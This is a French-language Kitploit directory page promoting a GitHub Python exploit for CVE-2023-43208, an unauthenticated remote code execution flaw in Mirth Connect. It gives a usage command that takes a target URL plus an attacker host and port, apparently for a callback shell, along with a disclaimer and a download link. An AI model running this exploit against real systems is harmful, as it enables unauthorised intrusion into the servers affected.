Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/azrvs/mirth-connect-cve-2023-43208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubazrvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Exploitation Python de CVE-2023-43208 Mirth Connect RCE (XStream non authentifié)

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 : Exécution de code à distance (RCE) non authentifiée dans NextGen Mirth Connect

Python Version Vulnerability

Cet exploit exploite une vulnérabilité critique de désérialisation dans le moteur XStream de Mirth Connect. Elle découle d'un correctif incomplet pour la CVE-2023-37679, permettant l'exécution arbitraire de code non authentifiée sur toutes les versions antérieures à la 4.4.1.

Utilisation

root@kitploit:~
python3 mirth_rce.py https://{cible} <hôte_attaquant> <port_attaquant>

Avertissement

Ce script d'exploit est destiné strictement à des fins éducatives et à des audits de sécurité autorisés afin d'aider les défenseurs à atténuer la CVE-2023-43208 ; toute utilisation de cet outil contre des cibles non autorisées est illégale et relève de la seule responsabilité de l'utilisateur final. L'auteur fournit ce logiciel « tel quel » sans aucune garantie, décline toute responsabilité en cas d'utilisation abusive ou de dommages, et ne cautionne ni n'encourage les activités non autorisées. Utilisez-le à vos propres risques et uniquement dans le respect des lois applicables.

Télécharger l’outil